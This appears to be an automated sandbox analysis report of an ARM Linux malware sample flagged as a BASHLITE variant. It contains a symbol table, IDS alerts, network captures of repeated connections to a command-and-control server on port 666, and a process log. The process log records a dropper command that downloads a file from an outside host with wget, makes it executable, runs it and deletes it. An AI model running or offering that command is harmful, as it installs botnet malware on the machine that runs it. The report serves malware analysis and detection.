gethostbyname2 | .symtab | 0x13694 | 104 | FUNC | <unknown> | DEFAULT | 2 | ||
gethostbyname2.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gethostbyname2_r | .symtab | 0x194e0 | 672 | FUNC | <unknown> | DEFAULT | 2 | ||
gethostbyname2_r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gethostbyname_r | .symtab | 0x1b4f0 | 760 | FUNC | <unknown> | DEFAULT | 2 | ||
gethostbyname_r.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gethostname | .symtab | 0x1b81c | 120 | FUNC | <unknown> | DEFAULT | 2 | ||
gethostname.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getpagesize | .symtab | 0x166a4 | 40 | FUNC | <unknown> | DEFAULT | 2 | ||
getpagesize.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getpid | .symtab | 0x116fc | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
getpid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getppid | .symtab | 0x11654 | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
getppid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getrlimit | .symtab | 0x16714 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
getrlimit.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getsockname | .symtab | 0x13734 | 56 | FUNC | <unknown> | DEFAULT | 2 | ||
getsockname.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getsockopt | .symtab | 0x1376c | 68 | FUNC | <unknown> | DEFAULT | 2 | ||
getsockopt.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gettimeofday | .symtab | 0x118ec | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
gettimeofday.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
getuid | .symtab | 0x166cc | 20 | FUNC | <unknown> | DEFAULT | 2 | ||
getuid.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
h_errno | .symtab | 0x2f60c | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
hacks | .symtab | 0x290a4 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
hacks2 | .symtab | 0x290a8 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
hacks3 | .symtab | 0x290ac | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
hacks4 | .symtab | 0x290b0 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
hextable | .symtab | 0x1d7ac | 1024 | OBJECT | <unknown> | DEFAULT | 4 | ||
hoste.5443 | .symtab | 0x2f5d8 | 20 | OBJECT | <unknown> | DEFAULT | 13 | ||
htonl | .symtab | 0x13600 | 32 | FUNC | <unknown> | DEFAULT | 2 | ||
htons | .symtab | 0x135f0 | 16 | FUNC | <unknown> | DEFAULT | 2 | ||
httphex | .symtab | 0xc5b8 | 1204 | FUNC | <unknown> | DEFAULT | 2 | ||
i.4902 | .symtab | 0x29154 | 4 | OBJECT | <unknown> | DEFAULT | 12 | ||
index | .symtab | 0x13318 | 240 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_addr | .symtab | 0x13650 | 40 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_aton | .symtab | 0x193e8 | 248 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_aton.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
inet_makeaddr.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
inet_ntop | .symtab | 0x1a3a0 | 644 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_ntop4 | .symtab | 0x1a25c | 324 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_pton | .symtab | 0x1a040 | 540 | FUNC | <unknown> | DEFAULT | 2 | ||
inet_pton4 | .symtab | 0x19f70 | 208 | FUNC | <unknown> | DEFAULT | 2 | ||
initConnection | .symtab | 0xe56c | 552 | FUNC | <unknown> | DEFAULT | 2 | ||
init_rand | .symtab | 0x8760 | 216 | FUNC | <unknown> | DEFAULT | 2 | ||
initfini.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
initfini.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
initstate | .symtab | 0x150ac | 192 | FUNC | <unknown> | DEFAULT | 2 | ||
initstate_r | .symtab | 0x1545c | 228 | FUNC | <unknown> | DEFAULT | 2 | ||
ioctl | .symtab | 0x11a2c | 84 | FUNC | <unknown> | DEFAULT | 2 | ||
ioctl.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
isatty | .symtab | 0x13550 | 36 | FUNC | <unknown> | DEFAULT | 2 | ||
isatty.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
kill | .symtab | 0x118b8 | 52 | FUNC | <unknown> | DEFAULT | 2 | ||
kill.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
killer_status | .symtab | 0x293e8 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
last_id.5501 | .symtab | 0x293ac | 2 | OBJECT | <unknown> | DEFAULT | 12 | ||
last_ns_num.5500 | .symtab | 0x2f614 | 4 | OBJECT | <unknown> | DEFAULT | 13 | ||
libc/string/arm/_memcpy.S | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
libc/string/arm/bcopy.S | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-05-10T07:48:46.034007+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48432 | TCP |
2025-05-10T07:49:01.584776+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48434 | TCP |
2025-05-10T07:49:17.328900+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48438 | TCP |
2025-05-10T07:49:32.895357+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48440 | TCP |
2025-05-10T07:49:48.461767+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48442 | TCP |
2025-05-10T07:50:04.022516+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48444 | TCP |
2025-05-10T07:50:19.582127+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48446 | TCP |
2025-05-10T07:50:35.139981+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48448 | TCP |
2025-05-10T07:50:50.698277+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48450 | TCP |
2025-05-10T07:51:06.259310+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48452 | TCP |
2025-05-10T07:51:21.819878+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48454 | TCP |
2025-05-10T07:51:37.379252+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48456 | TCP |
2025-05-10T07:51:52.932531+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48458 | TCP |
2025-05-10T07:52:08.494544+0200 | 2839489 | ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response | 1 | 92.60.77.69 | 666 | 192.168.2.23 | 48460 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 10, 2025 07:48:43.010159016 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 10, 2025 07:48:45.483077049 CEST | 48432 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:48:45.756442070 CEST | 666 | 48432 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:48:45.756529093 CEST | 48432 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:48:45.756838083 CEST | 48432 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:48:46.033729076 CEST | 666 | 48432 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:48:46.034007072 CEST | 666 | 48432 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:48:46.034080982 CEST | 666 | 48432 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:48:46.034105062 CEST | 48432 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:48:46.320586920 CEST | 666 | 48432 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:48:48.385530949 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
May 10, 2025 07:48:49.153287888 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
May 10, 2025 07:49:01.038665056 CEST | 48434 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:01.161736965 CEST | 39256 | 443 | 192.168.2.23 | 34.249.145.219 |
May 10, 2025 07:49:01.161830902 CEST | 443 | 39256 | 34.249.145.219 | 192.168.2.23 |
May 10, 2025 07:49:01.162297010 CEST | 39256 | 443 | 192.168.2.23 | 34.249.145.219 |
May 10, 2025 07:49:01.162781000 CEST | 39256 | 443 | 192.168.2.23 | 34.249.145.219 |
May 10, 2025 07:49:01.162806034 CEST | 443 | 39256 | 34.249.145.219 | 192.168.2.23 |
May 10, 2025 07:49:01.311383009 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:01.312091112 CEST | 48434 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:01.312603951 CEST | 48434 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:01.584775925 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:01.584825993 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:01.584912062 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:01.585052013 CEST | 48434 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:01.585210085 CEST | 48434 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:01.857403994 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:01.857505083 CEST | 666 | 48434 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:03.231523037 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 10, 2025 07:49:15.517775059 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
May 10, 2025 07:49:16.596086025 CEST | 48438 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:16.934489012 CEST | 666 | 48438 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:16.935163975 CEST | 48438 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:16.935163975 CEST | 48438 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:17.225168943 CEST | 666 | 48438 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:17.328900099 CEST | 666 | 48438 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:17.328972101 CEST | 666 | 48438 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:17.329600096 CEST | 48438 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:17.705140114 CEST | 666 | 48438 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:19.613235950 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
May 10, 2025 07:49:32.340946913 CEST | 48440 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:32.622255087 CEST | 666 | 48440 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:32.622606993 CEST | 48440 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:32.622607946 CEST | 48440 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:32.895308018 CEST | 666 | 48440 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:32.895356894 CEST | 666 | 48440 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:32.895587921 CEST | 666 | 48440 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:32.895627022 CEST | 48440 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:33.168298006 CEST | 666 | 48440 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:44.185861111 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 10, 2025 07:49:47.905966043 CEST | 48442 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:48.180582047 CEST | 666 | 48442 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:48.180907011 CEST | 48442 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:48.181039095 CEST | 48442 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:48.461498022 CEST | 666 | 48442 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:48.461766958 CEST | 666 | 48442 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:48.461805105 CEST | 666 | 48442 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:49:48.462019920 CEST | 48442 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:49:48.749176979 CEST | 666 | 48442 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:01.154714108 CEST | 39256 | 443 | 192.168.2.23 | 34.249.145.219 |
May 10, 2025 07:50:01.196295023 CEST | 443 | 39256 | 34.249.145.219 | 192.168.2.23 |
May 10, 2025 07:50:03.474209070 CEST | 48444 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:03.746947050 CEST | 666 | 48444 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:03.747333050 CEST | 48444 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:03.747487068 CEST | 48444 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:04.022490025 CEST | 666 | 48444 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:04.022516012 CEST | 666 | 48444 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:04.022533894 CEST | 666 | 48444 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:04.022720098 CEST | 48444 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:04.295949936 CEST | 666 | 48444 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:19.034030914 CEST | 48446 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:19.308147907 CEST | 666 | 48446 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:19.308470964 CEST | 48446 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:19.308470964 CEST | 48446 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:19.581649065 CEST | 666 | 48446 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:19.582127094 CEST | 666 | 48446 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:19.582165003 CEST | 666 | 48446 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:19.582247019 CEST | 48446 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:19.855240107 CEST | 666 | 48446 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:34.593075991 CEST | 48448 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:34.866328001 CEST | 666 | 48448 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:34.866777897 CEST | 48448 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:34.866969109 CEST | 48448 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:35.139920950 CEST | 666 | 48448 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:35.139981031 CEST | 666 | 48448 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:35.140146017 CEST | 666 | 48448 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:35.140296936 CEST | 48448 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:35.414035082 CEST | 666 | 48448 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:50.151523113 CEST | 48450 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:50.424455881 CEST | 666 | 48450 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:50.424844027 CEST | 48450 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:50.424844980 CEST | 48450 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:50.698221922 CEST | 666 | 48450 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:50.698276997 CEST | 666 | 48450 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:50.698312998 CEST | 666 | 48450 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:50:50.698606014 CEST | 48450 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:50:50.971421003 CEST | 666 | 48450 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:05.711904049 CEST | 48452 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:05.985044956 CEST | 666 | 48452 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:05.985577106 CEST | 48452 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:05.985577106 CEST | 48452 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:06.258632898 CEST | 666 | 48452 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:06.259310007 CEST | 666 | 48452 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:06.259386063 CEST | 666 | 48452 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:06.259623051 CEST | 48452 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:06.532551050 CEST | 666 | 48452 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:21.272313118 CEST | 48454 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:21.545983076 CEST | 666 | 48454 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:21.546392918 CEST | 48454 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:21.546504974 CEST | 48454 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:21.819807053 CEST | 666 | 48454 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:21.819878101 CEST | 666 | 48454 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:21.819901943 CEST | 666 | 48454 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:21.820333004 CEST | 48454 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:22.093470097 CEST | 666 | 48454 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:36.833224058 CEST | 48456 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:37.105990887 CEST | 666 | 48456 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:37.106151104 CEST | 48456 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:37.106384039 CEST | 48456 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:37.379187107 CEST | 666 | 48456 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:37.379251957 CEST | 666 | 48456 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:37.379292011 CEST | 666 | 48456 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:37.379722118 CEST | 48456 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:37.652313948 CEST | 666 | 48456 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:52.386029959 CEST | 48458 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:52.658986092 CEST | 666 | 48458 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:52.659456968 CEST | 48458 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:52.659456968 CEST | 48458 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:52.932470083 CEST | 666 | 48458 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:52.932531118 CEST | 666 | 48458 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:52.932568073 CEST | 666 | 48458 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:51:52.933099031 CEST | 48458 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:51:53.206922054 CEST | 666 | 48458 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:52:07.946254015 CEST | 48460 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:52:08.219126940 CEST | 666 | 48460 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:52:08.219666004 CEST | 48460 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:52:08.219666004 CEST | 48460 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:52:08.494421959 CEST | 666 | 48460 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:52:08.494544029 CEST | 666 | 48460 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:52:08.494585991 CEST | 666 | 48460 | 92.60.77.69 | 192.168.2.23 |
May 10, 2025 07:52:08.494898081 CEST | 48460 | 666 | 192.168.2.23 | 92.60.77.69 |
May 10, 2025 07:52:08.767975092 CEST | 666 | 48460 | 92.60.77.69 | 192.168.2.23 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 10, 2025 07:48:45.960566044 CEST | 56453 | 53 | 192.168.2.23 | 1.1.1.1 |
May 10, 2025 07:48:45.960628986 CEST | 48936 | 53 | 192.168.2.23 | 1.1.1.1 |
May 10, 2025 07:48:46.104659081 CEST | 53 | 48936 | 1.1.1.1 | 192.168.2.23 |
May 10, 2025 07:48:46.104969978 CEST | 48936 | 53 | 192.168.2.23 | 1.1.1.1 |
May 10, 2025 07:48:46.113409042 CEST | 53 | 56453 | 1.1.1.1 | 192.168.2.23 |
May 10, 2025 07:48:46.113487005 CEST | 56453 | 53 | 192.168.2.23 | 1.1.1.1 |
May 10, 2025 07:48:46.247662067 CEST | 53 | 48936 | 1.1.1.1 | 192.168.2.23 |
May 10, 2025 07:48:46.255167007 CEST | 53 | 56453 | 1.1.1.1 | 192.168.2.23 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
May 10, 2025 07:48:45.960566044 CEST | 192.168.2.23 | 1.1.1.1 | 0xbf70 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
May 10, 2025 07:48:45.960628986 CEST | 192.168.2.23 | 1.1.1.1 | 0x87f1 | Standard query (0) | 28 | IN (0x0001) | false | |
May 10, 2025 07:48:46.104969978 CEST | 192.168.2.23 | 1.1.1.1 | 0x87f1 | Standard query (0) | 28 | IN (0x0001) | false | |
May 10, 2025 07:48:46.113487005 CEST | 192.168.2.23 | 1.1.1.1 | 0xbf70 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
May 10, 2025 07:48:46.104659081 CEST | 1.1.1.1 | 192.168.2.23 | 0x87f1 | Name error (3) | none | none | 28 | IN (0x0001) | false | |
May 10, 2025 07:48:46.113409042 CEST | 1.1.1.1 | 192.168.2.23 | 0xbf70 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
May 10, 2025 07:48:46.247662067 CEST | 1.1.1.1 | 192.168.2.23 | 0x87f1 | Name error (3) | none | none | 28 | IN (0x0001) | false | |
May 10, 2025 07:48:46.255167007 CEST | 1.1.1.1 | 192.168.2.23 | 0xbf70 | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 05:48:43 |
Start date (UTC): | 10/05/2025 |
Path: | /tmp/armv5l.elf |
Arguments: | /tmp/armv5l.elf |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....." |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/wget |
Arguments: | wget -q http://gay.energy/.../vivid -O ..... |
File size: | 548568 bytes |
MD5 hash: | 996940118df7bb2aaa718589d4e95c08 |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/chmod |
Arguments: | chmod 777 ..... |
File size: | 63864 bytes |
MD5 hash: | 739483b900c045ae1374d6f53a86a279 |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | /bin/sh ./..... |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:48:45 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/rm |
Arguments: | rm -rf ..... |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:48:44 |
Start date (UTC): | 10/05/2025 |
Path: | /tmp/armv5l.elf |
Arguments: | - |
File size: | 4956856 bytes |
MD5 hash: | 5ebfcae4fe2471fcc5695c2394773ff1 |
Start time (UTC): | 05:50:00 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 05:50:00 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.AuvqT3u8Nb /tmp/tmp.LwYSwGXz30 /tmp/tmp.PqowgKSo5U |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 05:50:00 |
Start date (UTC): | 10/05/2025 |
Path: | /usr/bin/dash |
Arguments: | - |
